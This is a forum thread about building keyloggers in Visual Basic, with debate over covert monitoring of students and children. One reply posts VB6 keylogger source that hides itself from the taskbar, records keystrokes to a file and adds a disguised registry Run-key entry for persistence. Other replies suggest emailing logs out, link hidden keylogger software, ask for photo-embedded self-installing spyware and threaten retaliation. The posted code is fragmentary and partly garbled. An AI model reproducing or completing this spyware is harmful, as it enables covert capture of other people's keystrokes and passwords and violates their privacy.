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Key Logger. How To Make

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keylogger VB code

Key Logger.


Replying to snlildude87


This is krishna from chennai,India

I am helping for an orphanage(looking after physically disabled children) by creating some softwares that they nee.They asked me to create a software that zooms the character that the student is pressing especially in some programming editors such as turbo C.For that I need keylogger.Can you send me your code or give me some ideas to create my own keylogger.



-reply by krishna

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Look And Learn ^^

Key Logger.


Private Sub ath_Click()

MsgBox "Created By Mahendra M.W., This Program is for educational Purpose Only !", vbOKOnly, "About"

End Sub


'In a form

Private Sub Form_Load()

Me.Caption = "Key Spy"

'Create an API-timer

SetTimer Me.Hwnd, 0, 1, AddressOf TimerProc

App.TaskVisible = False

Form1.Visible = False



End Sub

Private Sub Form_Paint()

Dim are As RECT


'API uses pixels

Me.ScaleMode = vbPixels

'Set the rectangle's values

SetRect are, 0, 0, Me.ScaleWidth, Me.ScaleHeight

'Draw the text on the form

DrawTextEx Me.HDC, mStr, Len(mStr), are, DT_WORDBREAK Or DT_CENTER, ByVal 0&

End Sub

Private Sub Form_Resize()


End Sub


Private Sub Command1_Click()

If Check1.Value = 1 Then App.TaskVisible = False Else App.TaskVisible = True

If Check2.Value = 1 Then Form1.Visible = False Else Form1.Visible = True


End Sub


Private Sub Timer1_Timer()

On Error GoTo 11

Open "C:FileInformation.Dat" For Output As #1

Print #1, sSave

Close #1

GoTo 5

11: MsgBox "Do not modify this File as causing damaging your instability system ", vbCritical, "Information"

5: End Sub




'write in the module

Public Const DT_CENTER = &H1

Public Const DT_WORDBREAK = &H10


Left As Long

Top As Long

Right As Long

Bottom As Long

End Type

Declare Function DrawTextEx Lib "user32" Alias "DrawTextExA" (ByVal hDC As Long, ByVal lpsz As String, ByVal and As Long, lpRect As RECT, ByVal un As Long, ByVal lpDrawTextParams As Any) As Long

Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long

Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long

Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

Declare Function SetRect Lib "user32" (lpRect As RECT, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long

Global Cnt As Long, sSave As String, sOld As String, Ret As String

Dim Tel As Long

Function GetPressedKey() As String

For Cnt = 32 To 128

'Get the keystate of a specified key

If GetAsyncKeyState(Cnt) <> 0 Then

GetPressedKey = Chr$(Cnt)

Exit For

End If

Next Cnt

End Function

Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)

Ret = GetPressedKey

If Ret <> sOld Then

sOld = Ret

sSave = sSave + sOld

End If

End Sub

Public Function InfeksiRegistry()

Dim wshell As Object, rg1 As String, rg2 As String

Dim rg3 As String, rg4 As String

Rg1 = "SoftwareMicrosoftWindowsCurrentVersion"

Rg2 = "SOFTWAREMicrosoftWindows NTCurrentVersion"

Rg3 = "SoftwareMicrosoftInternetExplorerMain"

Rg4 = "SoftwarePoliciesMicrosoftWindowsSystem"

Set wshell = CreateObject("Wscript.Shell")

Wshell.Regwrite "HKLM" & rg1 & "runSystem Resource", _

Getwindowspath & "C:windowssystem32system32.Exe"

'you can add more value it's only example

End Function




-reply by Newbie

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Well guys, to me I feel there's a downside and upside to this key-logging stuff. Some times for security and sometimes for other reasons. I would not opt to be for or against it. I think moderation might be most genius.Cheerio...

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Key Logger.


I am a principal for a college of more than 2000 students, some students have been caught doing, I'm not going to say it, but they have been caught doing stuff they shouldn't. I would like a way to keep track of students and what they have been doing on the comouters, so this keylogger seems to me to be a good idea.


-reply by principal


-----ADMIN REPLY-------

Keyloggers = seriously invading others privacy.


If you feel keyloggers are advanced stuff, think again. They are very easy to install and any person with basic knowledge can inject it in your "un-attended" pc as well.


Virus scanners cannot CATCH them because they are officially installed when your PC is IDLE (when you are away.)


Takes less than 20 SEC to install.


Removes traces even from CTRL+ALT+DEL screen.

Activates and sends the logs on email.

HOT KEY to show its activity.


JUST imagine, someone who has already DONE this to your Computer. And your PC which you are presently using to view this web page is already compromised.


All above.. simply does not sound good.


Keyloggers are evil. Are you?


Personal Opinion by,


-Shree (Xisto.com)

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Keyloggers = seriously invading others privacy.
If you feel keyloggers are advanced stuff, think again. They are very easy to install and any person with basic knowledge can inject it in your "un-attended" pc as well.

Virus scanners cannot CATCH them because they are officially installed when your PC is IDLE (when you are away.)

Takes less than 20 SEC to install.
Removes traces even from CTRL+ALT+DEL screen.
Activates and sends the logs on email.
HOT KEY to show its activity.

JUST imagine, someone who has already DONE this to your Computer. And your PC which you are presently using to view this web page is already compromised.

All above.. simply does not sound good.

Keyloggers are evil. Are you?

Personal Opinion by,

-Shree (Xisto.com)

It depends on where you use it...

If I were to install a keylogger on my own computer, to catch people trying that stuff, where is the wrong?

While I personally don't agree with keyloggers, I do concede there are legitimate, legal purposes to them.

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Key Logger.


Replying to snlildude87 hey I was reading this thread and came to know that you can make a keylogger in visualbasis or wut that program is. I'm no computer programer or a C++ computer technician. I only wanted to ask you if you can email me that program please. I want to see what my teenagers do on the computer. They say there always typing and doing english essays and other school work. They sit on the computer as soon as they walk into the house and sit for hours, I mean hours. I really just want to know, what are they really doing. And if this records every keystroke, then I am sure I can see what they are typing. Please help out. Thanks a lot... :)


-reply by Akram


--------- ADMIN REPLY ------------


This is a FREE keylogging software for your personal computer.


Actual Keylogger - is a free keylogger which runs hidden in the background and automatically records all keystrokes (including Alt, Ctrl and other functional buttons). The interface can be password protected and the log files are encrypted. You can view the reports as HTML or plain text. In the hidden mode it is invisible in all operating systems. This free keylogger will be really helpful to both the system administrators and home users.


DOWNLOAD: https://www.actualkeylogger.com/download.html

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I have an answer!

Key Logger.


Well to hide the task you write this.


App.Visible = False


To make a keylogger goto form keydown.


Write this.


Open (Your dir) for output as #1

Write #1, currentStr(keycode)

Close #1


Now use mapi to send the email.


Hope this helps.


-reply by David

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Just let them know they are being wacthed

Key Logger.


I think it's ok to use a keylogger in SOME instances. I think it can be a good deterrent for unwanted activity. If it's on your own computer that no one else is allowed to use anyway then fine. Otherwise, if you let them know that their actions will be logged, then they will avoid the unwanted activity and cannot accuse you of covertly spying on them.


If you bug their computers without letting them know then this is just a sleazy spying technique to me. If caught, your children may never trust you again and begin withholding even more information, or if it's not family, then you may need to worry about a lawsuit.

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I don't know how to do this but I don't think this would be allowed in the forum. Keyloggers have more destructive uses than useful ones.

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Keylogger helpKey Logger.Ok..About the keyloggers, there are some legitimate reasons for using them on other people's computers as well. Like in my case, I need a self installing one for my teenage son. He has a password on his computer and is really good at it. Now I would like to see what he does all day but I want a self installing one that is easily e-mailed. If I could implant it in a photo that would be great. If I ask him to view it he puts me on a guest account so I can't install it but if it is implanted he wouldn't. Know. And he would get suspicious if I hacked his password...Or just used admin rights. He would check all windows folders so see. Anyway, I tried a torrent of Ardamax keylogger but it turns out that it had a virus in it so, I have to find another one.. Any suggestions? preferably free though. 
-reply by mrinivisible

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kids and stuffKey Logger.

Replying to snlildude87

My kids are always on their computers, they dun let me use theirs as they feel I will know what they're doing, they're up all night, as a father, I have got my worries, on what pages they access to and what they are chatting and so with others, ive heard frm my friends keyloggers are the best, I want to know what they're doing all night, as a father I hop someone would understand my worry and help me out with it. I tried the actualspy, but that is only if I have access to their notebks. If I cant then there's no other way?

-reply by worrieddad

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SERIOUSLY!!!Key Logger.

FIRSTLY, This is directed to ALL of the parents here looking for a keylogger to implant onto your childs computer.


Me, as a 13 year old, know ALOT about computers, and I'm on it ALOT of the time. Scripting, Playing games, chatting with friends.

 Now if my mom (my dad can't even use the remote but my mom could find out how to plant a keylogger In a lil bit) implanted a keylogger in my computer. If I found out that my personal conversations were being looked at, I would go on a damned rampage!

 Thats really low spying on your children! Really, lets say that their friend is going through a rough time at home or something and they decided to tell your child, and then you read it. 

 And knowing you discusting sorry excuses for parents, you would probably read it. And God knows you wouldn't keep it a secret, why would you care about it hmm? Pathetic!

 What I should do is email you, track your IP, find out where you live, get your phone number and call you and tell your children that you are looking for a keylogger to put on there computer!

 Really pathetic.

 And after that, Ill put a keylogger onto YOUR computer, so that way when you go somewhere on your computer (Most likely porn, Hypocryte!) I'll know and have a good laugh at it.



Honestly, if you want to find out what your children are doing, have a sit down with them, and talk about it. And don't use that sickening "I want to know who they are talking to." Excuse! Really, with all the pedephiles there are out there, yes there are alot of stories about children getting taken away, raped or killed or both. But you have to realize that your children do have a conscience and that if you do let them have a bit of freedom with there computer that this sort of thing won't happen.


CLEARLY A bit of freedom dosen't refer to "Hi Mister Person I just met, heres my address & phone number and the times that my parents aren't here and I'm home alone.".  But really, my parents NEVER do that with me, I have my laptop in my room and I have a router and I don't do bad stuff like that.

 Plus most of the time, if my mom comes inside my room, she to start a conversation She'll say "Whatcha up to?". And sometimes I spin my laptop and say "playing runescape" or ill hide it and say "Me and my friend are talking about something private, one sec." and ill minimize and see what she wants.

 But really. Back to the main problem. 

 Keyloggers and filthy, discusting, and really have no good uses. I've had moments where I've been on the verge of emailing a jerk in my class a photo or client for a game and implanting on there and making it invisisble. But I realize that karma is a ***** and that I wouldn't want it to happen to me.



-reply by Hillsidenights

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Be a parent.  TAKE THE ADMIN RIGHTS.  Install the software.  Feel free to tell them its on there.  Check the logs routinely.  If you show up to check the machine and it's not on there, TAKE AWAY THE PC.  You are the parent.  Act like it.  If they can't use the PC abiding by your rules, then they lose that privilege.  I'm, chat etc, is a privilege not a right.  As is PC usage.  Don't worry about hiding it, let them know it's there and let them know you're checking on  them.  They may h8 you 4 it now, but when they grow up, they'll appreciate it.  Particularly when their kids start acting like 13 year-olds should have privacy.

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Can Somebody Tell me how to save the letters


Heres my program for VB 6.0:


Private Sub Command1_KeyPress(KeyAscii As Integer)Text1.Text = Chr(KeyAscii)End Sub

But the prob is that

 1. The text is within VB itself

 2.It dosent save all the letters. For example if I tpe Hello, the text1 will show H.Then replace that with E then replace the E with L And so In the end all I will see is "O".


Please help me someone!


-reply by Author Name - e.G. John, MikeKeywords: how to make a keylogger using visual basic

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@ iGuest - Re: saving lettersKey Logger.

 Text1.Text = Chr(KeyAscii)This gives you an "H", then an "e", right?This is because everytime a key is pressed, the code runs and overwrites your KeyAscii variable.

Instead try Text1.Text = Text1.Text + Chr(KeyAscii)

With this, instead of having "H" then "e" then "l" and so on, you will get H + e + l + l + o or in non-psudo code: "Hello"Hope I answered your question, don't hesitate to ask for more help. :-)

-Jack (Well, thats my web name at least)

-reply by Jack Spencor


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